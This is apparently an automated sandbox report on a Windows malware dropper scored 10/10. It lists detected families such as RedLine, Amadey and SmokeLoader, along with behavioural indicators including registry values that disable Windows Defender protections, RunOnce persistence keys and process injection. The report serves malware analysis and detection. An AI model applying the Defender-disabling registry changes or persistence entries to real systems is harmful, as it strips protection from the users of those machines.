Malware Analysis Report

2025-01-23 09:51

Sample ID: 231010-zebrcabg43
Target: a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0
SHA256: a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0
Tags: amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google dropper evasion infostealer loader persistence phishing rat trojan mystic lutyr magia discovery rootkit spyware stealer
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10

SHA256: a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0

Threat Level: Known bad

The file a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0 was found to be: Known bad.

Malicious Activity Summary

Healer

SectopRAT

RedLine

RedLine payload

Modifies Windows Defender Real-time Protection settings

Glupteba payload

Detect Mystic stealer payload

Detected google phishing page

DcRat

Mystic

SectopRAT payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Detects Healer an antivirus disabler dropper

Glupteba

Amadey

SmokeLoader

Stops running service(s)

Modifies Windows Firewall

Drops file in Drivers directory

Downloads MZ/PE file

Reads user/profile data of web browsers

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Windows security modification

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMonFS driver

Checks installed software on the system

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Windows directory

Drops file in Program Files directory

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Checks SCSI registry key(s)

Modifies Internet Explorer settings

Uses Task Scheduler COM API

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Modifies data under HKEY_USERS

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of UnmapMainImage

Suspicious behavior: GetForegroundWindowSpam

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2023-10-10 20:37

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2023-10-10 20:37
Reported: 2023-10-10 21:00
Platform: win7-20230831-en
Max time kernel: 167s
Max time network: 194s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat

Detected google phishing page

phishing google

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\CC0A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\CC0A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\CC0A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\CC0A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\CC0A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\CC0A.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2272 created 1196 N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe C:\Windows\Explorer.EXE
PID 2272 created 1196 N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe C:\Windows\Explorer.EXE

Downloads MZ/PE file

Stops running service(s)

evasion

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97CD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97CD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wg5mI1Lf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wg5mI1Lf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\TT7kp0pz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CDDF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\TT7kp0pz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1ZD37Ls8.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10E8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10E8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10E8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10E8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10E8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10E8.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\CC0A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\CC0A.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wg5mI1Lf.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\TT7kp0pz.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\97CD.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2584 set thread context of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1628 set thread context of 2096 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{CC16FB61-67AF-11EE-9FE5-CE1068F0F1D9} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{CBBFDAB1-67AF-11EE-9FE5-CE1068F0F1D9} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\CC0A.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5AC6.exe N/A
